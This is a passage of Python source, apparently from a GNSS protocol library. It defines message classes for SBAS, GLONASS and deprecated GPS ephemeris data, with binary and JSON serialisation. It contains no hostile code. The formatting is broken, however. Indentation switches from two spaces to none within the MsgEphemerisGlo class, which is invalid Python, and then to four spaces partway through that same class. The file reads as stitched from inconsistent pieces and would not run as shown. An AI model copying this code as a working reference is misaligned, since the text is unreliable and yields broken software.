    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into buf at offset."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisSbasDepB._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict of the framed message and its fields."""
    self.to_binary()
    d = super(MsgEphemerisSbasDepB, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_EPHEMERIS_SBAS = 0x008C
class MsgEphemerisSbas(SBP):
  """SBP class for message MSG_EPHEMERIS_SBAS (0x008C).

  Construct it either from an already-parsed SBP frame (passed as
  ``sbp``) or inline from keyword arguments naming every field.

  Fields
  ------
  common (EphemerisCommonContent) : values common to all ephemeris types
  pos (array of double) : position of the GEO at time toe
  vel, acc (array of float) : velocity / acceleration of the GEO at time toe
  a_gf0, a_gf1 (float) : time offset and drift of the GEO clock w.r.t.
      SBAS Network Time
  sender (int) : optional sender ID, defaults to SENDER_ID (see sbp/msg.py)
  """
  # Field order defines the wire format and must match __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContent._parser),
    'pos' / construct.Array(3, construct.Float64l),
    'vel' / construct.Array(3, construct.Float32l),
    'acc' / construct.Array(3, construct.Float32l),
    'a_gf0' / construct.Float32l,
    'a_gf1' / construct.Float32l,)
  __slots__ = ['common', 'pos', 'vel', 'acc', 'a_gf0', 'a_gf1']

  def __init__(self, sbp=None, **kwargs):
    """Initialize from a parsed SBP frame, or inline from keyword fields."""
    if sbp:
      super(MsgEphemerisSbas, self).__init__(sbp.msg_type, sbp.sender,
                                             sbp.length, sbp.payload, sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super(MsgEphemerisSbas, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_SBAS
      self.sender = kwargs.pop('sender', SENDER_ID)
      # Every payload field is mandatory; order matches __slots__.
      for field in MsgEphemerisSbas.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Build a MsgEphemerisSbas from the JSON-encoded string s."""
    return MsgEphemerisSbas.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a MsgEphemerisSbas from a decoded JSON dict d."""
    return MsgEphemerisSbas(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload d and update every payload field."""
    parsed = MsgEphemerisSbas._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Produce a framed/packed SBP message."""
    container = containerize(exclude_fields(self))
    self.payload = MsgEphemerisSbas._parser.build(container)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into buf at offset."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisSbas._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict of the framed message and its fields."""
    self.to_binary()
    d = super(MsgEphemerisSbas, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_EPHEMERIS_GLO_DEP_B = 0x0085
class MsgEphemerisGloDepB(SBP):
  """SBP class for message MSG_EPHEMERIS_GLO_DEP_B (0x0085).

  Construct it either from an already-parsed SBP frame (passed as
  ``sbp``) or inline from keyword arguments naming every field.

  Carries the GLO satellite orbit parameters used to compute satellite
  position, velocity and clock offset; see the GLO ICD 5.1 "Table 4.5
  Characteristics of words of immediate information (ephemeris
  parameters)" for details.

  Fields
  ------
  common (EphemerisCommonContentDepB) : values common to all ephemeris types
  gamma (double) : relative deviation of predicted carrier frequency
      from nominal
  tau (double) : correction to the SV time
  pos, vel, acc (array) : position / velocity / acceleration of the SV
      at tb in the PZ-90.02 coordinate system
  sender (int) : optional sender ID, defaults to SENDER_ID (see sbp/msg.py)
  """
  # Field order defines the wire format and must match __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContentDepB._parser),
    'gamma' / construct.Float64l,
    'tau' / construct.Float64l,
    'pos' / construct.Array(3, construct.Float64l),
    'vel' / construct.Array(3, construct.Float64l),
    'acc' / construct.Array(3, construct.Float64l),)
  __slots__ = ['common', 'gamma', 'tau', 'pos', 'vel', 'acc']

  def __init__(self, sbp=None, **kwargs):
    """Initialize from a parsed SBP frame, or inline from keyword fields."""
    if sbp:
      super(MsgEphemerisGloDepB, self).__init__(sbp.msg_type, sbp.sender,
                                                sbp.length, sbp.payload,
                                                sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super(MsgEphemerisGloDepB, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_GLO_DEP_B
      self.sender = kwargs.pop('sender', SENDER_ID)
      # Every payload field is mandatory; order matches __slots__.
      for field in MsgEphemerisGloDepB.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Build a MsgEphemerisGloDepB from the JSON-encoded string s."""
    return MsgEphemerisGloDepB.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a MsgEphemerisGloDepB from a decoded JSON dict d."""
    return MsgEphemerisGloDepB(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload d and update every payload field."""
    parsed = MsgEphemerisGloDepB._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Produce a framed/packed SBP message."""
    container = containerize(exclude_fields(self))
    self.payload = MsgEphemerisGloDepB._parser.build(container)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into buf at offset."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisGloDepB._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict of the framed message and its fields."""
    self.to_binary()
    d = super(MsgEphemerisGloDepB, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_EPHEMERIS_GLO_DEP_C = 0x0087
class MsgEphemerisGloDepC(SBP):
  """SBP class for message MSG_EPHEMERIS_GLO_DEP_C (0x0087).

  Construct it either from an already-parsed SBP frame (passed as
  ``sbp``) or inline from keyword arguments naming every field.

  Carries the GLO satellite orbit parameters used to compute satellite
  position, velocity and clock offset; see the GLO ICD 5.1 "Table 4.5
  Characteristics of words of immediate information (ephemeris
  parameters)" for details.

  Fields
  ------
  common (EphemerisCommonContentDepB) : values common to all ephemeris types
  gamma (double) : relative deviation of predicted carrier frequency
      from nominal
  tau (double) : correction to the SV time
  d_tau (double) : equipment delay between L1 and L2
  pos, vel, acc (array) : position / velocity / acceleration of the SV
      at tb in the PZ-90.02 coordinate system
  fcn (int) : frequency slot, FCN+8 (that is [1..14]); 0 or 0xFF for invalid
  sender (int) : optional sender ID, defaults to SENDER_ID (see sbp/msg.py)
  """
  # Field order defines the wire format and must match __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContentDepB._parser),
    'gamma' / construct.Float64l,
    'tau' / construct.Float64l,
    'd_tau' / construct.Float64l,
    'pos' / construct.Array(3, construct.Float64l),
    'vel' / construct.Array(3, construct.Float64l),
    'acc' / construct.Array(3, construct.Float64l),
    'fcn' / construct.Int8ul,)
  __slots__ = ['common', 'gamma', 'tau', 'd_tau', 'pos', 'vel', 'acc', 'fcn']

  def __init__(self, sbp=None, **kwargs):
    """Initialize from a parsed SBP frame, or inline from keyword fields."""
    if sbp:
      super(MsgEphemerisGloDepC, self).__init__(sbp.msg_type, sbp.sender,
                                                sbp.length, sbp.payload,
                                                sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super(MsgEphemerisGloDepC, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_GLO_DEP_C
      self.sender = kwargs.pop('sender', SENDER_ID)
      # Every payload field is mandatory; order matches __slots__.
      for field in MsgEphemerisGloDepC.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Build a MsgEphemerisGloDepC from the JSON-encoded string s."""
    return MsgEphemerisGloDepC.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a MsgEphemerisGloDepC from a decoded JSON dict d."""
    return MsgEphemerisGloDepC(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload d and update every payload field."""
    parsed = MsgEphemerisGloDepC._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Produce a framed/packed SBP message."""
    container = containerize(exclude_fields(self))
    self.payload = MsgEphemerisGloDepC._parser.build(container)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into buf at offset."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisGloDepC._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict of the framed message and its fields."""
    self.to_binary()
    d = super(MsgEphemerisGloDepC, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_EPHEMERIS_GLO_DEP_D = 0x0088
class MsgEphemerisGloDepD(SBP):
  """SBP class for message MSG_EPHEMERIS_GLO_DEP_D (0x0088).

  Construct it either from an already-parsed SBP frame (passed as
  ``sbp``) or inline from keyword arguments naming every field.

  This observation message has been deprecated in favor of the
  ephemeris message using floats for size reduction.

  Fields
  ------
  common (EphemerisCommonContentDepB) : values common to all ephemeris types
  gamma (double) : relative deviation of predicted carrier frequency
      from nominal
  tau (double) : correction to the SV time
  d_tau (double) : equipment delay between L1 and L2
  pos, vel, acc (array) : position / velocity / acceleration of the SV
      at tb in the PZ-90.02 coordinate system
  fcn (int) : frequency slot, FCN+8 (that is [1..14]); 0 or 0xFF for invalid
  iod (int) : issue of data; equal to the 7 bits of the immediate data
      word t_b
  sender (int) : optional sender ID, defaults to SENDER_ID (see sbp/msg.py)
  """
  # Field order defines the wire format and must match __slots__.
  _parser = construct.Struct(
    'common' / construct.Struct(EphemerisCommonContentDepB._parser),
    'gamma' / construct.Float64l,
    'tau' / construct.Float64l,
    'd_tau' / construct.Float64l,
    'pos' / construct.Array(3, construct.Float64l),
    'vel' / construct.Array(3, construct.Float64l),
    'acc' / construct.Array(3, construct.Float64l),
    'fcn' / construct.Int8ul,
    'iod' / construct.Int8ul,)
  __slots__ = ['common', 'gamma', 'tau', 'd_tau', 'pos', 'vel', 'acc',
               'fcn', 'iod']

  def __init__(self, sbp=None, **kwargs):
    """Initialize from a parsed SBP frame, or inline from keyword fields."""
    if sbp:
      super(MsgEphemerisGloDepD, self).__init__(sbp.msg_type, sbp.sender,
                                                sbp.length, sbp.payload,
                                                sbp.crc)
      self.from_binary(sbp.payload)
    else:
      super(MsgEphemerisGloDepD, self).__init__()
      self.msg_type = SBP_MSG_EPHEMERIS_GLO_DEP_D
      self.sender = kwargs.pop('sender', SENDER_ID)
      # Every payload field is mandatory; order matches __slots__.
      for field in MsgEphemerisGloDepD.__slots__:
        setattr(self, field, kwargs.pop(field))

  def __repr__(self):
    return fmt_repr(self)

  @staticmethod
  def from_json(s):
    """Build a MsgEphemerisGloDepD from the JSON-encoded string s."""
    return MsgEphemerisGloDepD.from_json_dict(json.loads(s))

  @staticmethod
  def from_json_dict(d):
    """Build a MsgEphemerisGloDepD from a decoded JSON dict d."""
    return MsgEphemerisGloDepD(SBP.from_json_dict(d), **d)

  def from_binary(self, d):
    """Parse the binary payload d and update every payload field."""
    parsed = MsgEphemerisGloDepD._parser.parse(d)
    for field in self.__class__.__slots__:
      setattr(self, field, getattr(parsed, field))

  def to_binary(self):
    """Produce a framed/packed SBP message."""
    container = containerize(exclude_fields(self))
    self.payload = MsgEphemerisGloDepD._parser.build(container)
    return self.pack()

  def into_buffer(self, buf, offset):
    """Produce a framed/packed SBP message into buf at offset."""
    self.payload = containerize(exclude_fields(self))
    self.parser = MsgEphemerisGloDepD._parser
    self.stream_payload.reset(buf, offset)
    return self.pack_into(buf, offset, self._build_payload)

  def to_json_dict(self):
    """Return a JSON-serializable dict of the framed message and its fields."""
    self.to_binary()
    d = super(MsgEphemerisGloDepD, self).to_json_dict()
    d.update(walk_json_dict(exclude_fields(self)))
    return d
SBP_MSG_EPHEMERIS_GLO = 0x008B
class MsgEphemerisGlo(SBP):
"""SBP class for message MSG_EPHEMERIS_GLO (0x008B).
You can have MSG_EPHEMERIS_GLO inherit its fields directly
from an inherited SBP object, or construct it inline using a dict
of its fields.
The ephemeris message returns a set of satellite orbit
parameters that is used to calculate GLO satellite position,
velocity, and clock offset. Please see the GLO ICD 5.1 "Table 4.5
Characteristics of words of immediate information (ephemeris parameters)"
for more details.
Parameters
----------
sbp : SBP
SBP parent object to inherit from.
common : EphemerisCommonContent
Values common for all ephemeris types
gamma : float
Relative deviation of predicted carrier frequency from nominal
tau : float
Correction to the SV time
d_tau : float
Equipment delay between L1 and L2
pos : array
Position of the SV at tb in PZ-90.02 coordinates system
vel : array
Velocity vector of the SV at tb in PZ-90.02 coordinates system
acc : array
Acceleration vector of the SV at tb in PZ-90.02 coordinates sys
fcn : int
Frequency slot. FCN+8 (that is [1..14]). 0 or 0xFF for invalid
iod : int
Issue of data. Equal to the 7 bits of the immediate data word t_b
sender : int
Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
"""
_parser = construct.Struct(
'common' / construct.Struct(EphemerisCommonContent._parser),
'gamma' / construct.Float32l,
'tau' / construct.Float32l,
'd_tau' / construct.Float32l,
'pos' / construct.Array(3, construct.Float64l),
'vel' / construct.Array(3, construct.Float64l),
'acc' / construct.Array(3, construct.Float32l),
'fcn' / construct.Int8ul,
'iod' / construct.Int8ul,)
__slots__ = [
'common',
'gamma',
'tau',
'd_tau',
'pos',
'vel',
'acc',
'fcn',
'iod',
]
def __init__(self, sbp=None, **kwargs):
if sbp:
super( MsgEphemerisGlo,
self).__init__(sbp.msg_type, sbp.sender, sbp.length,
sbp.payload, sbp.crc)
self.from_binary(sbp.payload)
else:
super( MsgEphemerisGlo, self).__init__()
self.msg_type = SBP_MSG_EPHEMERIS_GLO
self.sender = kwargs.pop('sender', SENDER_ID)
self.common = kwargs.pop('common')
self.gamma = kwargs.pop('gamma')
self.tau = kwargs.pop('tau')
self.d_tau = kwargs.pop('d_tau')
self.pos = kwargs.pop('pos')
self.vel = kwargs.pop('vel')
self.acc = kwargs.pop('acc')
self.fcn = kwargs.pop('fcn')
self.iod = kwargs.pop('iod')
def __repr__(self):
return fmt_repr(self)
@staticmethod
def from_json(s):
"""Given a JSON-encoded string s, build a message object.
"""
d = json.loads(s)
return MsgEphemerisGlo.from_json_dict(d)
@staticmethod
def from_json_dict(d):
sbp = SBP.from_json_dict(d)
return MsgEphemerisGlo(sbp, **d)
def from_binary(self, d):
"""Given a binary payload d, update the appropriate payload fields of
the message.
"""
p = MsgEphemerisGlo._parser.parse(d)
for n in self.__class__.__slots__:
setattr(self, n, getattr(p, n))
def to_binary(self):
"""Produce a framed/packed SBP message.
"""
c = containerize(exclude_fields(self))
self.payload = MsgEphemerisGlo._parser.build(c)
return self.pack()
    def into_buffer(self, buf, offset):
        """Produce a framed/packed SBP message into the provided buffer and offset.
        """
        # Serialize in place: point the shared stream at buf/offset and let
        # pack_into drive _build_payload with this class's parser.
        self.payload = containerize(exclude_fields(self))
        self.parser = MsgEphemerisGlo._parser
        self.stream_payload.reset(buf, offset)
        return self.pack_into(buf, offset, self._build_payload)
    def to_json_dict(self):
        """Return a JSON-serializable dict of the framed message plus its
        payload fields.
        """
        self.to_binary()  # refresh self.payload so the frame dict is current
        d = super(MsgEphemerisGlo, self).to_json_dict()
        j = walk_json_dict(exclude_fields(self))
        d.update(j)
        return d
SBP_MSG_EPHEMERIS_DEP_D = 0x0080


class MsgEphemerisDepD(SBP):
    """SBP class for message MSG_EPHEMERIS_DEP_D (0x0080).

    You can have MSG_EPHEMERIS_DEP_D inherit its fields directly
    from an inherited SBP object, or construct it inline using a dict
    of its fields.

    The ephemeris message returns a set of satellite orbit
    parameters that is used to calculate GPS satellite position,
    velocity, and clock offset. Please see the Navstar GPS
    Space Segment/Navigation user interfaces (ICD-GPS-200, Table
    20-III) for more details.

    Parameters
    ----------
    sbp : SBP
      SBP parent object to inherit from.
    tgd : double
      Group delay differential between L1 and L2
    c_rs : double
      Amplitude of the sine harmonic correction term to the orbit radius
    c_rc : double
      Amplitude of the cosine harmonic correction term to the orbit radius
    c_uc : double
      Amplitude of the cosine harmonic correction term to the argument of latitude
    c_us : double
      Amplitude of the sine harmonic correction term to the argument of latitude
    c_ic : double
      Amplitude of the cosine harmonic correction term to the angle of inclination
    c_is : double
      Amplitude of the sine harmonic correction term to the angle of inclination
    dn : double
      Mean motion difference
    m0 : double
      Mean anomaly at reference time
    ecc : double
      Eccentricity of satellite orbit
    sqrta : double
      Square root of the semi-major axis of orbit
    omega0 : double
      Longitude of ascending node of orbit plane at weekly epoch
    omegadot : double
      Rate of right ascension
    w : double
      Argument of perigee
    inc : double
      Inclination
    inc_dot : double
      Inclination first derivative
    af0 : double
      Polynomial clock correction coefficient (clock bias)
    af1 : double
      Polynomial clock correction coefficient (clock drift)
    af2 : double
      Polynomial clock correction coefficient (rate of clock drift)
    toe_tow : double
      Time of week
    toe_wn : int
      Week number
    toc_tow : double
      Clock reference time of week
    toc_wn : int
      Clock reference week number
    valid : int
      Is valid?
    healthy : int
      Satellite is healthy?
    sid : GnssSignalDep
      GNSS signal identifier
    iode : int
      Issue of ephemeris data
    iodc : int
      Issue of clock data
    reserved : int
      Reserved field
    sender : int
      Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
    """
    # Payload codec: little-endian field order defines the wire format.
    _parser = construct.Struct(
        'tgd' / construct.Float64l,
        'c_rs' / construct.Float64l,
        'c_rc' / construct.Float64l,
        'c_uc' / construct.Float64l,
        'c_us' / construct.Float64l,
        'c_ic' / construct.Float64l,
        'c_is' / construct.Float64l,
        'dn' / construct.Float64l,
        'm0' / construct.Float64l,
        'ecc' / construct.Float64l,
        'sqrta' / construct.Float64l,
        'omega0' / construct.Float64l,
        'omegadot' / construct.Float64l,
        'w' / construct.Float64l,
        'inc' / construct.Float64l,
        'inc_dot' / construct.Float64l,
        'af0' / construct.Float64l,
        'af1' / construct.Float64l,
        'af2' / construct.Float64l,
        'toe_tow' / construct.Float64l,
        'toe_wn' / construct.Int16ul,
        'toc_tow' / construct.Float64l,
        'toc_wn' / construct.Int16ul,
        'valid' / construct.Int8ul,
        'healthy' / construct.Int8ul,
        'sid' / construct.Struct(GnssSignalDep._parser),
        'iode' / construct.Int8ul,
        'iodc' / construct.Int16ul,
        'reserved' / construct.Int32ul,)
    # Order mirrors _parser so from_binary/to_binary round-trip by name.
    __slots__ = [
        'tgd',
        'c_rs',
        'c_rc',
        'c_uc',
        'c_us',
        'c_ic',
        'c_is',
        'dn',
        'm0',
        'ecc',
        'sqrta',
        'omega0',
        'omegadot',
        'w',
        'inc',
        'inc_dot',
        'af0',
        'af1',
        'af2',
        'toe_tow',
        'toe_wn',
        'toc_tow',
        'toc_wn',
        'valid',
        'healthy',
        'sid',
        'iode',
        'iodc',
        'reserved',
    ]

    def __init__(self, sbp=None, **kwargs):
        """Wrap a parsed SBP frame, or build the message from field kwargs."""
        if sbp:
            # Inherit framing from the parent frame, then decode its payload.
            super(MsgEphemerisDepD, self).__init__(sbp.msg_type, sbp.sender,
                                                   sbp.length, sbp.payload,
                                                   sbp.crc)
            self.from_binary(sbp.payload)
        else:
            super(MsgEphemerisDepD, self).__init__()
            self.msg_type = SBP_MSG_EPHEMERIS_DEP_D
            self.sender = kwargs.pop('sender', SENDER_ID)
            # kwargs.pop without a default raises KeyError for missing fields.
            self.tgd = kwargs.pop('tgd')
            self.c_rs = kwargs.pop('c_rs')
            self.c_rc = kwargs.pop('c_rc')
            self.c_uc = kwargs.pop('c_uc')
            self.c_us = kwargs.pop('c_us')
            self.c_ic = kwargs.pop('c_ic')
            self.c_is = kwargs.pop('c_is')
            self.dn = kwargs.pop('dn')
            self.m0 = kwargs.pop('m0')
            self.ecc = kwargs.pop('ecc')
            self.sqrta = kwargs.pop('sqrta')
            self.omega0 = kwargs.pop('omega0')
            self.omegadot = kwargs.pop('omegadot')
            self.w = kwargs.pop('w')
            self.inc = kwargs.pop('inc')
            self.inc_dot = kwargs.pop('inc_dot')
            self.af0 = kwargs.pop('af0')
            self.af1 = kwargs.pop('af1')
            self.af2 = kwargs.pop('af2')
            self.toe_tow = kwargs.pop('toe_tow')
            self.toe_wn = kwargs.pop('toe_wn')
            self.toc_tow = kwargs.pop('toc_tow')
            self.toc_wn = kwargs.pop('toc_wn')
            self.valid = kwargs.pop('valid')
            self.healthy = kwargs.pop('healthy')
            self.sid = kwargs.pop('sid')
            self.iode = kwargs.pop('iode')
            self.iodc = kwargs.pop('iodc')
            self.reserved = kwargs.pop('reserved')

    def __repr__(self):
        """Return a human-readable dump of the message fields (via fmt_repr)."""
        return fmt_repr(self)

    @staticmethod
    def from_json(s):
        """Given a JSON-encoded string s, build a message object.
        """
        d = json.loads(s)
        return MsgEphemerisDepD.from_json_dict(d)

    @staticmethod
    def from_json_dict(d):
        """Build a message object from an already-decoded JSON dict ``d``."""
        sbp = SBP.from_json_dict(d)
        return MsgEphemerisDepD(sbp, **d)

    def from_binary(self, d):
        """Given a binary payload d, update the appropriate payload fields of
        the message.
        """
        p = MsgEphemerisDepD._parser.parse(d)
        # Copy every declared payload field from the parsed container to self.
        for n in self.__class__.__slots__:
            setattr(self, n, getattr(p, n))

    def to_binary(self):
        """Produce a framed/packed SBP message.
        """
        c = containerize(exclude_fields(self))
        self.payload = MsgEphemerisDepD._parser.build(c)
        return self.pack()

    def into_buffer(self, buf, offset):
        """Produce a framed/packed SBP message into the provided buffer and offset.
        """
        self.payload = containerize(exclude_fields(self))
        self.parser = MsgEphemerisDepD._parser
        self.stream_payload.reset(buf, offset)
        return self.pack_into(buf, offset, self._build_payload)

    def to_json_dict(self):
        """Return a JSON-serializable dict of the framed message plus fields."""
        self.to_binary()  # refresh self.payload so the frame dict is current
        d = super(MsgEphemerisDepD, self).to_json_dict()
        j = walk_json_dict(exclude_fields(self))
        d.update(j)
        return d
SBP_MSG_EPHEMERIS_DEP_A = 0x001A


class MsgEphemerisDepA(SBP):
    """SBP class for message MSG_EPHEMERIS_DEP_A (0x001A).

    You can have MSG_EPHEMERIS_DEP_A inherit its fields directly
    from an inherited SBP object, or construct it inline using a dict
    of its fields.

    Deprecated.

    Parameters
    ----------
    sbp : SBP
      SBP parent object to inherit from.
    tgd : double
      Group delay differential between L1 and L2
    c_rs : double
      Amplitude of the sine harmonic correction term to the orbit radius
    c_rc : double
      Amplitude of the cosine harmonic correction term to the orbit radius
    c_uc : double
      Amplitude of the cosine harmonic correction term to the argument of latitude
    c_us : double
      Amplitude of the sine harmonic correction term to the argument of latitude
    c_ic : double
      Amplitude of the cosine harmonic correction term to the angle of inclination
    c_is : double
      Amplitude of the sine harmonic correction term to the angle of inclination
    dn : double
      Mean motion difference
    m0 : double
      Mean anomaly at reference time
    ecc : double
      Eccentricity of satellite orbit
    sqrta : double
      Square root of the semi-major axis of orbit
    omega0 : double
      Longitude of ascending node of orbit plane at weekly epoch
    omegadot : double
      Rate of right ascension
    w : double
      Argument of perigee
    inc : double
      Inclination
    inc_dot : double
      Inclination first derivative
    af0 : double
      Polynomial clock correction coefficient (clock bias)
    af1 : double
      Polynomial clock correction coefficient (clock drift)
    af2 : double
      Polynomial clock correction coefficient (rate of clock drift)
    toe_tow : double
      Time of week
    toe_wn : int
      Week number
    toc_tow : double
      Clock reference time of week
    toc_wn : int
      Clock reference week number
    valid : int
      Is valid?
    healthy : int
      Satellite is healthy?
    prn : int
      PRN being tracked
    sender : int
      Optional sender ID, defaults to SENDER_ID (see sbp/msg.py).
    """
    # Payload codec: little-endian field order defines the wire format.
    _parser = construct.Struct(
        'tgd' / construct.Float64l,
        'c_rs' / construct.Float64l,
        'c_rc' / construct.Float64l,
        'c_uc' / construct.Float64l,
        'c_us' / construct.Float64l,
        'c_ic' / construct.Float64l,
        'c_is' / construct.Float64l,
        'dn' / construct.Float64l,
        'm0' / construct.Float64l,
        'ecc' / construct.Float64l,
        'sqrta' / construct.Float64l,
        'omega0' / construct.Float64l,
        'omegadot' / construct.Float64l,
        'w' / construct.Float64l,
        'inc' / construct.Float64l,
        'inc_dot' / construct.Float64l,
        'af0' / construct.Float64l,
        'af1' / construct.Float64l,
        'af2' / construct.Float64l,
        'toe_tow' / construct.Float64l,
        'toe_wn' / construct.Int16ul,
        'toc_tow' / construct.Float64l,
        'toc_wn' / construct.Int16ul,
        'valid' / construct.Int8ul,
        'healthy' / construct.Int8ul,
        'prn' / construct.Int8ul,)
    # Order mirrors _parser so from_binary/to_binary round-trip by name.
    __slots__ = [
        'tgd',
        'c_rs',
        'c_rc',
        'c_uc',
        'c_us',
        'c_ic',
        'c_is',
        'dn',
        'm0',
        'ecc',
        'sqrta',
        'omega0',
        'omegadot',
        'w',
        'inc',
        'inc_dot',
        'af0',
        'af1',
        'af2',
        'toe_tow',
        'toe_wn',
        'toc_tow',
        'toc_wn',
        'valid',
        'healthy',
        'prn',
    ]

    def __init__(self, sbp=None, **kwargs):
        """Wrap a parsed SBP frame, or build the message from field kwargs."""
        if sbp:
            # Inherit framing from the parent frame, then decode its payload.
            super(MsgEphemerisDepA, self).__init__(sbp.msg_type, sbp.sender,
                                                   sbp.length, sbp.payload,
                                                   sbp.crc)
            self.from_binary(sbp.payload)
        else:
            super(MsgEphemerisDepA, self).__init__()
            self.msg_type = SBP_MSG_EPHEMERIS_DEP_A
            self.sender = kwargs.pop('sender', SENDER_ID)
            # kwargs.pop without a default raises KeyError for missing fields.
            self.tgd = kwargs.pop('tgd')
            self.c_rs = kwargs.pop('c_rs')
            self.c_rc = kwargs.pop('c_rc')
            self.c_uc = kwargs.pop('c_uc')
            self.c_us = kwargs.pop('c_us')
            self.c_ic = kwargs.pop('c_ic')
            self.c_is = kwargs.pop('c_is')
            self.dn = kwargs.pop('dn')
            self.m0 = kwargs.pop('m0')
            self.ecc = kwargs.pop('ecc')
            self.sqrta = kwargs.pop('sqrta')
            self.omega0 = kwargs.pop('omega0')
            self.omegadot = kwargs.pop('omegadot')
            self.w = kwargs.pop('w')
            self.inc = kwargs.pop('inc')
            self.inc_dot = kwargs.pop('inc_dot')
            self.af0 = kwargs.pop('af0')
            self.af1 = kwargs.pop('af1')
            self.af2 = kwargs.pop('af2')
            self.toe_tow = kwargs.pop('toe_tow')
            self.toe_wn = kwargs.pop('toe_wn')
            self.toc_tow = kwargs.pop('toc_tow')
            self.toc_wn = kwargs.pop('toc_wn')
            self.valid = kwargs.pop('valid')
            self.healthy = kwargs.pop('healthy')
            self.prn = kwargs.pop('prn')

    def __repr__(self):
        """Return a human-readable dump of the message fields (via fmt_repr)."""
        return fmt_repr(self)

    @staticmethod
    def from_json(s):
        """Given a JSON-encoded string s, build a message object.
        """
        d = json.loads(s)
        return MsgEphemerisDepA.from_json_dict(d)

    @staticmethod
    def from_json_dict(d):
        """Build a message object from an already-decoded JSON dict ``d``."""
        sbp = SBP.from_json_dict(d)
        return MsgEphemerisDepA(sbp, **d)

    def from_binary(self, d):
        """Given a binary payload d, update the appropriate payload fields of
        the message.
        """
        p = MsgEphemerisDepA._parser.parse(d)
        # Copy every declared payload field from the parsed container to self.
        for n in self.__class__.__slots__:
            setattr(self, n, getattr(p, n))

    def to_binary(self):
        """Produce a framed/packed SBP message.
        """
        c = containerize(exclude_fields(self))
        self.payload = MsgEphemerisDepA._parser.build(c)
        return self.pack()

    def into_buffer(self, buf, offset):
        """Produce a framed/packed SBP message into the provided buffer and offset.
        """
        self.payload = containerize(exclude_fields(self))
        self.parser = MsgEphemerisDepA._parser
        self.stream_payload.reset(buf, offset)
        return self.pack_into(buf, offset, self._build_payload)

    def to_json_dict(self):
        """Return a JSON-serializable dict of the framed message plus fields."""
        self.to_binary()  # refresh self.payload so the frame dict is current
        d = super(MsgEphemerisDepA, self).to_json_dict()
        j = walk_json_dict(exclude_fields(self))
        d.update(j)
        return d
SBP_MSG_EPHEMERIS_DEP_B = 0x0046


class MsgEphemerisDepB(SBP):
    """SBP class for message MSG_EPHEMERIS_DEP_B (0x0046).

    You can have MSG_EPHEMERIS_DEP_B inherit its fields directly
    from an inherited SBP object, or construct it inline using a dict
    of its fields.

    Deprecated.

    Parameters
    ----------
    sbp : SBP
      SBP parent object to inherit from.
    tgd : double
      Group delay differential between L1 and L2
    c_rs : double
      Amplitude of the sine harmonic correction term to the orbit radius
    c_rc : double
      Amplitude of the cosine harmonic correction term to the orbit radius
    c_uc : double
      Amplitude of the cosine harmonic correction term to the argument of latitude
    c_us : double
      Amplitude of the sine harmonic correction term to the argument of latitude
    c_ic : double
      Amplitude of the cosine harmonic correction term to the angle of inclination
    c_is : double
      Amplitude of the sine harmonic correction term to the angle of inclination
    dn : double
      Mean motion difference
    m0 : double
      Mean anomaly at reference time
    ecc : double
      Eccentricity of satellite orbit
    sqrta : double
      Square root of the semi-major axis of orbit
    omega0 : double
      Longitude of ascending node of orbit plane at weekly epoch
    omegadot : double
      Rate of right ascension
    w : double
      Argument of perigee
    inc : double
      Inclination
    inc_dot : double
      Inclination first derivative
    af0 : double
      Polynomial clock correction coefficient (clock bias)
    af1 : double
      Polynomial clock correction coefficient (clock drift)
    af2 : double
